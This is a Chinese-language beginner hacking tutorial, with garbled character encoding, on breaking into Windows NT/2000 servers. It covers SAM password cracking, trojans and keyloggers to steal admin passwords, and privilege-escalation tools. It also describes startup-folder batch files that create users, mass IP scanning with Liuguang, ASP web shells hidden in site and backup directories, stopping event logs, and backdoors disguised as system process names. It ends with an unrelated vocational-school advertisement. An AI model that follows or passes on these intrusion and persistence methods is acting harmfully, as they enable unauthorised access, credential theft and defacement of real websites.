拿到sam后，用lc3破解版暴力破解吧，這種方法比較費(fèi)時(shí)。

2，要是有運(yùn)行權(quán)限，拿就拋個(gè)木馬上去吧！雖說(shuō)木馬可能也會(huì)沒(méi)有權(quán)限，但自啟動(dòng)的模式在admin登陸后可能會(huì)自己提升了權(quán)限。要注意的是， 好放 新的木馬，因?yàn)槟抉R很容易被殺毒軟件查殺！

3，其實(shí)和2差不多，只不過(guò)變成了鍵盤記錄器，選個(gè)國(guó)產(chǎn)的，一般殺毒軟件不會(huì)殺出來(lái)，認(rèn)真配置好后傳上去，下線睡覺(jué)或是做家務(wù)去！等到網(wǎng)管用了機(jī)器，密碼就會(huì)被紀(jì)錄下來(lái)，我們?cè)谌ト。琣dmin就順利到手了：）

4，getadmin和pipeupadmin，前者是nt4用的，后者是2000�？纯磶椭朗褂梅椒ê螅ㄆ鋵�(shí)猜都猜得到）就可以提升一個(gè)用戶的權(quán)限，有一步登天的感覺(jué)！

5，手工做個(gè)bat文件，里面是建立用戶等命令，然后把它放到自啟動(dòng)下，有很多途徑：documents and settings下的開(kāi)始菜單下的啟動(dòng)，知道了吧，至于要順利放進(jìn)去的話，會(huì)遇到空格長(zhǎng)名等等問(wèn)題，就看你的基本功了。win.ini里有l(wèi)oad，加進(jìn)去。還有便是注冊(cè)表，好好研究一下regedit.

6，本地溢出。這個(gè)比較高深，我能告訴大家的只是，去四處找找本地溢出程序。

總的來(lái)說(shuō)，unicode改主頁(yè)是非常簡(jiǎn)單的，但是若是要取得更高的權(quán)限，就要一番努力，上面的方法只是些思路，實(shí)際操作時(shí)需要具體處理，開(kāi)動(dòng)腦筋，把方法都結(jié)合起來(lái)。（是不是聽(tīng)起來(lái)有點(diǎn)玄？）



想想好像沒(méi)有什么其他的途徑要說(shuō)了，什么？linux,呵呵，我還不大懂，就不在這里瞎說(shuō)了。

那今天就說(shuō)到這里了，6里面我會(huì)說(shuō)說(shuō)后門制作，小問(wèn)題和我的一點(diǎn)經(jīng)驗(yàn)。期待吧！
－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－－
這是 后一節(jié)了，寫(xiě)的傻傻的，但我畢竟堅(jiān)持下來(lái)了，值得鼓勵(lì)！（偶爾阿q一下）在寫(xiě)菜鳥(niǎo)操的同時(shí)，我們的cshu(cshu.51.net)也在默默成長(zhǎng)，但現(xiàn)在我要準(zhǔn)備離開(kāi)了，真是有點(diǎn)舍不得。在今后的日子里，還請(qǐng)大家多多支持cshu和christ,freedom他們。

今天說(shuō)點(diǎn)什么呢？沒(méi)有主題，亂談一通吧！

首先我要吐一次血，當(dāng)然是為了推薦一樣?xùn)|西，就是流光！（那么沒(méi)創(chuàng)意，老土！）不管怎么說(shuō)，小榕的流光應(yīng)該是中國(guó)第一黑軟，他綜合了諸多的攻擊手段，使攻擊便捷化，當(dāng)然可能讓我們養(yǎng)成了懶惰的習(xí)慣。不會(huì)用流光的 好去學(xué)學(xué)。

我來(lái)說(shuō)說(shuō)我自己覺(jué)得 有用的幾個(gè)項(xiàng)目：

1，探測(cè)----掃描pop3/ftp/nt/sql主機(jī)，要是無(wú)目的地黑，那么用這個(gè)再合適不過(guò)了。進(jìn)去后填好ip范圍（范圍可以掃大一點(diǎn)，它很快的），至于類型嘛，要是你要一大堆unicode，那么選擇iis/frontpage再合適不過(guò)了，要是要更高的權(quán)限，sql是不錯(cuò)的選擇。完成后，表格里會(huì)多出一大堆東西。

remote execute-x 這是幾種不同的unicode，用它比用ie來(lái)執(zhí)行方便多了，但是echo有問(wèn)題（是我自己不會(huì)，會(huì)的朋友快教我）

remote ftp pcaw file method-x 這是遠(yuǎn)程獲取pc anywhere的密碼文件，要使用的話，你首先要有一個(gè)ftp賬號(hào)，去申請(qǐng)吧！順利拿到cif文件后，用流光自帶的工具就可以解開(kāi)密碼，很爽的！

remote ftp sam -x 拿sam的，還是用 好的lc3來(lái)解吧！

frontpage extended 這是frontpage擴(kuò)展，不過(guò)不要高興，是要密碼的。但是若是后面跟了privilege hole的話，放聲大笑吧�。ㄐ⌒牟灰屶従幽弥说稕_進(jìn)來(lái)）打開(kāi)frontpage，打開(kāi)站點(diǎn)，http://ip就可以了�。╤ttp://不要忘）

此外還有一點(diǎn)變通，大家肯定讀的懂的。

2，探測(cè)----高級(jí)掃描工具。這可是流光4中的重頭戲，綜合了很多漏洞，還可以用plugin功能加入新的漏洞。這項(xiàng)功能很適合對(duì)某一站點(diǎn)進(jìn)行探測(cè)，很快掃出漏洞后，流光會(huì)生成一個(gè)報(bào)告文件，其中含漏洞的連接，要是你看不懂的話，建議你拿出x-scan，里面有漏洞描述的。

3，工具----nt管道遠(yuǎn)程命令，種植者，這兩項(xiàng)功能對(duì)我們攻擊nt來(lái)說(shuō)是相當(dāng)好用的。但前提是要有賬號(hào)，相信在此之前你應(yīng)該有幾個(gè)了吧，那就快點(diǎn)試試吧！

總的來(lái)說(shuō)，流光的使用是非常簡(jiǎn)單的，其中也有不少工具值得我們一用，tools目錄里有一些很好的工具，exploit里則有很多溢出攻擊程序，前提是你應(yīng)該會(huì)c,不會(huì)的話我也沒(méi)辦法，學(xué)會(huì)c起碼要看10倍于菜鳥(niǎo)操的資料吧！另外給大家推薦一個(gè)站點(diǎn)：www.hack.co.za，有什么漏洞的話就去那里找找，你會(huì)有所收獲的。

　

然后我想說(shuō)說(shuō)一些黑站的經(jīng)驗(yàn)。

☆當(dāng)我們用unicode控制一臺(tái)機(jī)器時(shí)，我向大家推薦用asp木馬，阿新的改良版，本站有下載的。上傳asp文件前不要忘了修改list.asp中的地址信息， 好也放一個(gè)cmd.asp上去，運(yùn)氣好的話，可以運(yùn)行命令的。

上傳好后，ie里輸入其中index.asp的地址，呵呵，我們就能方便地管理其中的文件了，可以改網(wǎng)頁(yè)，改代碼，上傳腳本文件麻煩？那就用它來(lái)生成吧！

推薦他的 大原因便是----便于隱藏！一般網(wǎng)站總有一個(gè)龐大的目錄，選擇一個(gè)深的，放進(jìn)去，網(wǎng)管很難發(fā)現(xiàn)的：）

后對(duì)大家說(shuō)一句，要是有備份目錄（很多網(wǎng)站都有的）， 好也放一份進(jìn)去。有一次我用這個(gè)東西修改一家網(wǎng)站的首頁(yè)，改了兩三次網(wǎng)管也沒(méi)刪掉，可是突然一天不行了，原來(lái)他用了備份的網(wǎng)頁(yè)（還算機(jī)靈吧）

☆我想對(duì)大家說(shuō)，對(duì)于國(guó)內(nèi)網(wǎng)站， 好不要惡意去攻擊，因?yàn)槲覀兪侵袊?guó)人嘛！在5/1期間，我發(fā)現(xiàn)有一些國(guó)內(nèi)站點(diǎn)被黑，留下的頁(yè)面上不是poison box，而是中國(guó)人的話，這真是無(wú)恥到了極點(diǎn)�。。。〈蠹仪f(wàn)不要學(xué)哦。還有，現(xiàn)在網(wǎng)上有很多還沒(méi)有網(wǎng)頁(yè)的主機(jī)，往往有很多漏洞，對(duì)于這種機(jī)器，竟有一些小人也會(huì)去改收頁(yè)（比如上海那個(gè)姓楊的小子）這算什么？顯示實(shí)力，炫耀技術(shù)？呵呵，見(jiàn)鬼去吧！

我的建議是，不要改它的首頁(yè)，而是努力去拿admin,控制它，這樣我們有很多選擇：肉雞，等它有正式主頁(yè)后可以黑，或者把我們的主頁(yè)放上去！比申請(qǐng)好多了，權(quán)限又足！當(dāng)然很危險(xiǎn)：）這樣做是不是有品位多了？

☆要是我們拿到了admin，但有時(shí)卻不能執(zhí)行一些命令，那很可能是因?yàn)榉⻊?wù)啟動(dòng)的問(wèn)題。試著用以下命令：

net start termservice 啟動(dòng)win2k的終端控制

net start workstation 打開(kāi)net use 功能

net start lanmanserver 打開(kāi)ipc

net start eventlog 啟動(dòng)日志（你不會(huì)那么傻吧！stop）

net start schedule 打開(kāi)計(jì)劃(at)

net start server 共享

還有很多，net命令里去找吧！

☆打開(kāi)telnet

1，遠(yuǎn)程去運(yùn)行ntlm.exe，流光里有

2，net stop telnet

3, net start telnet

☆我推薦幾種后門：winshell（默認(rèn)端口5277）相對(duì)于srv，它好一些。remotenc這個(gè)是榕哥的作品，可以以指定用戶執(zhí)行，還可以自己起服務(wù)的名字，很棒的！

至于服務(wù)的名字，建議大家去看看win2k的進(jìn)程名，學(xué)著起相類似的名字，要做到使網(wǎng)管看到了也不會(huì)引起警覺(jué)，或是有警覺(jué)也不敢去刪，呵呵，這樣就 好了！

☆代理問(wèn)題。我推薦大家自己去做代理，控制了一臺(tái)機(jī)器后，用snake前輩寫(xiě)的skserver去做個(gè)sock5。

具體做法就不詳細(xì)說(shuō)了，因?yàn)楸容^普通，只要熟悉一下用法就可以了。

做好了sock5，我們可以上oicq，下棋都用它，sock5代理可是很少見(jiàn)的哦！

要是實(shí)在拿不到sock5,用http也可以，這里推薦一個(gè)軟件tcp2http，它具有很多功能。在給個(gè)站點(diǎn)：dzc.126.com國(guó)內(nèi) 好的的代理站點(diǎn)，怕死的朋友千萬(wàn)不要錯(cuò)過(guò)。

　

后說(shuō)說(shuō)一些對(duì)于菜鳥(niǎo)同志的建議：

不要把黑當(dāng)作一種顯示自己的行為，要是你想耍威風(fēng)，用url欺騙來(lái)騙mm 合適了，還可以弄個(gè)yahoo什么的……

不要在一項(xiàng)技術(shù)上停留過(guò)長(zhǎng)時(shí)間，當(dāng)你熟練掌握后，應(yīng)該迅速學(xué)習(xí)下一個(gè)新技術(shù)。

不要和被你黑的網(wǎng)管過(guò)多接觸，前車之鑒哦。

對(duì)于一臺(tái)好機(jī)器要做好后門，不要輕易失去它。

想好好學(xué)黑客的話，就常去各大論壇轉(zhuǎn)轉(zhuǎn)，仔細(xì)讀教程，忘記聊天室和網(wǎng)絡(luò)游戲吧！

實(shí)踐是 好的教程，再次重申！

應(yīng)該多學(xué)計(jì)算機(jī)的其他方面的知識(shí)，任何知識(shí)在一定場(chǎng)合都是有用的。

編程技術(shù)……好像太難了，不過(guò)再難也要學(xué)。

想不出來(lái)了………………
　　湖南省陽(yáng)光電子技術(shù)學(xué)校常年開(kāi)設(shè)：手機(jī)維修培訓(xùn)、家電維修培訓(xùn)、電工培訓(xùn)、電腦維修培訓(xùn)、焊工培訓(xùn)--面向全國(guó)火爆招生！網(wǎng)址：http://www.hnygpx.com 報(bào)名電話：13807313137)。安置就業(yè)�？荚嚭细耦C發(fā)全國(guó)通用權(quán)威證書(shū)。采用我校多年來(lái)獨(dú)創(chuàng)的“模塊教學(xué)法”,理論與實(shí)踐相結(jié)合、原理＋圖紙＋機(jī)器三位一體的教學(xué)模式，半天理論，半天實(shí)踐，通俗易懂，確保無(wú)任何基礎(chǔ)者也能全面掌握維修技能、成為同行業(yè)中的佼佼者。工作(一期不會(huì)，免費(fèi)學(xué)會(huì)為止)。